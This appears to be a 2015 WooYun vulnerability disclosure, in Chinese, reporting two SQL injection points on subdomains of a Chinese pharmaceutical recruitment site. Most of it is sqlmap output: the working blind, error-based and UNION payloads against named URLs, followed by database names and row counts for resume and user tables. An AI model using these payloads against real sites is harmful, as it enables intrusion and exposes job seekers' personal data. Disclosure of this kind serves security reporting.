当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144955

漏洞标题:中国药业人才网2处SQL注入

相关厂商:中国药业人才网

漏洞作者: 路人甲

提交时间:2015-10-08 18:22

修复时间:2015-11-22 18:24

公开时间:2015-11-22 18:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中国药业人才网2处SQL注入

详细说明:

1.http://tj.medejob.com/jobseeker/stage/FAQ_Question.aspx?id=9


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=9 AND 1932=1932
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=9 AND 7049=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)+(SEL
ECT (CASE WHEN (7049=7049) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(122)
+CHAR(113)))
---
[23:59:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[23:59:26] [INFO] fetching database names
[23:59:26] [INFO] the SQL query used returns 15 entries
[23:59:26] [INFO] resumed: 2mdb
[23:59:26] [INFO] resumed: 52hoteldb
[23:59:26] [INFO] resumed: bptdb
[23:59:26] [INFO] resumed: cptdb
[23:59:26] [INFO] resumed: hospdb
[23:59:26] [INFO] resumed: jrdb
[23:59:26] [INFO] resumed: linyuedb
[23:59:26] [INFO] resumed: master
[23:59:26] [INFO] resumed: medejobdb
[23:59:26] [INFO] resumed: model
[23:59:26] [INFO] resumed: msdb
[23:59:26] [INFO] resumed: myshipjobdb
[23:59:26] [INFO] resumed: oiljobdb
[23:59:26] [INFO] resumed: spadb
[23:59:26] [INFO] resumed: tempdb
available databases [15]:
[*] 2mdb
[*] 52hoteldb
[*] bptdb
[*] cptdb
[*] hospdb
[*] jrdb
[*] linyuedb
[*] master
[*] medejobdb
[*] model
[*] msdb
[*] myshipjobdb
[*] oiljobdb
[*] spadb
[*] tempdb


http://ln.medejob.com/jobseeker/stage/FAQ_Question.aspx?class=1


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: class (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: class=1 AND 2079=2079
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: class=1 AND 4570=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113)+
(SELECT (CASE WHEN (4570=4570) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(
112)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: class=1 UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(11
3)+CHAR(122)+CHAR(114)+CHAR(89)+CHAR(84)+CHAR(98)+CHAR(83)+CHAR(78)+CHAR(107)+CHAR(74)+CHAR(98)+CHAR
(113)+CHAR(122)+CHAR(107)+CHAR(112)+CHAR(113),NULL--
---
[23:58:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[23:58:25] [INFO] fetching database names
[23:58:25] [INFO] the SQL query used returns 15 entries
[23:58:25] [INFO] resumed: "2mdb"
[23:58:25] [INFO] resumed: "52hoteldb"
[23:58:25] [INFO] resumed: "bptdb"
[23:58:25] [INFO] resumed: "cptdb"
[23:58:25] [INFO] resumed: "hospdb"
[23:58:25] [INFO] resumed: "jrdb"
[23:58:26] [INFO] resumed: "linyuedb"
[23:58:26] [INFO] resumed: "master"
[23:58:26] [INFO] resumed: "medejobdb"
[23:58:26] [INFO] resumed: "model"
[23:58:26] [INFO] resumed: "msdb"
[23:58:26] [INFO] resumed: "myshipjobdb"
[23:58:26] [INFO] resumed: "oiljobdb"
[23:58:26] [INFO] resumed: "spadb"
[23:58:26] [INFO] resumed: "tempdb"
available databases [15]:
[*] 2mdb
[*] 52hoteldb
[*] bptdb
[*] cptdb
[*] hospdb
[*] jrdb
[*] linyuedb
[*] master
[*] medejobdb
[*] model
[*] msdb
[*] myshipjobdb
[*] oiljobdb
[*] spadb
[*] tempdb


漏洞证明:

Database: medejobdb
+-----------------------------------------+---------+
| Table | Entries |
+-----------------------------------------+---------+
| dbo.Experience | 150793 |
| dbo.VIEW_QUERYRESUME | 99551 |
| dbo.JobseekerUser | 95990 |
| dbo.Education | 93011 |
| dbo.view_resume | 85005 |
| dbo.view_resumeUnionju | 84912 |
| dbo.View_DepartPosList | 53259 |
| dbo.VIEW_POSITION | 51477 |
| dbo.CompanyStat | 35131 |
| dbo.VIEW_COMPANYSTAT | 34986 |
| dbo.Baidu_xml | 31835 |
| dbo.Temp_ImportResume | 30737 |
| dbo.Train | 29043 |
| dbo.T_CompanyClub | 9323 |
| dbo.T_User_Other | 9323 |
| dbo.ResumeEn | 5289 |
| dbo.ResumeVisitors | 4684 |
| dbo.CompanyLogin | 4517 |
| dbo.view_companyLogin | 4410 |
| dbo.AppRequest | 3760 |
| dbo.ResumeFavoriteType | 2045 |
| dbo.PositionLatest | 1985 |
| dbo.positionWeb | 1856 |
| dbo.CompanyDepart | 1780 |
| dbo.Selfproject | 1430 |
| dbo.RecommendCompany | 1318 |
| dbo.view_adAndCompany | 1009 |
| dbo.report_resumeStatByAddress | 966 |
| dbo.Certificate | 880 |
| dbo.resumeFollow | 538 |
| dbo.SearchCompanyFilter | 451 |
| dbo.CompanyEmailTemplate | 410 |
| dbo.CompanySMSTemplate | 408 |
| dbo.ResumeRecommLog | 377 |
| dbo.ResumeRecommLog | 377 |
| dbo.ToolsFile | 364 |
| dbo.ToolsFile | 364 |
| dbo.School | 315 |
| dbo.AddressEn | 307 |
| dbo.AddressEn | 307 |
| dbo.Sites | 297 |
| dbo.AdPosition | 245 |
| dbo.RecomendPosition | 177 |
| dbo.Dictionary | 174 |
| dbo.MonthResumeLog | 126 |
| dbo.PositionCategoryEn | 120 |
| dbo.PositionCategoryEn | 120 |
| dbo.DayViewResumeLog | 113 |
| dbo.report_resumeStatByPositionCategory | 111 |
| dbo.ResumeSiteRef | 108 |
| dbo.view_RecommendResume | 108 |
| dbo.CompanyDelLog | 79 |
| dbo.CompanyDelList | 58 |
| dbo.ResumeFilter | 58 |
| dbo.IndustryEn | 42 |
| dbo.IndustryEn | 42 |
| dbo.AdRight | 40 |
| dbo.Zph_Position | 36 |
| dbo.HumanResources | 26 |
| dbo.syncCompany | 25 |
| dbo.DictionaryWelfare | 23 |
| dbo.CompanyTemplate | 21 |
| dbo.ResumePhotoLatest | 20 |
| dbo.FAQ_Question | 19 |
| dbo.Zph_Company | 19 |
| dbo.ArticleType | 16 |
| dbo.ServiceUnitPrice | 16 |
| dbo.IntentionEN | 15 |
| dbo.IntentionEN | 15 |
| dbo.CompanyProperty | 14 |
| dbo.CompanyNews | 12 |
| dbo.Mot_Publish_ResumeDetail | 12 |
| dbo.Mot_Publish_ResumeDetail | 12 |
| dbo.FlashADItem | 11 |
| dbo.FlashADItem | 11 |
| dbo.Ad_Urgent | 10 |
| dbo.Ad_Urgent | 10 |
| dbo.view_qyb | 10 |
| dbo.AdSize | 9 |
| dbo.syncPosition | 9 |
| dbo.CompanyAttach | 8 |
| dbo.CompanyAttach | 8 |
| dbo.ResumeSuPei | 8 |
| dbo.exposition | 7 |
| dbo.FAQ_Class | 7 |
| dbo.WebSiteMessageClass | 6 |
| dbo.WebSiteMessageClass | 6 |
| dbo.AdType | 4 |
| dbo.EmailType | 4 |
| dbo.RegistType | 4 |
| dbo.Zph_Class | 4 |
| dbo.CompanyFeedback | 1 |
| dbo.CompanyRequire | 1 |
| dbo.ResumeFavoriteEn | 1 |
| dbo.ResumeFavoriteEn | 1 |
| dbo.ResumeFeedback | 1 |
| dbo.SendXSoft | 1 |
| dbo.Temp_ResumeByID | 1 |
+-----------------------------------------+---------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝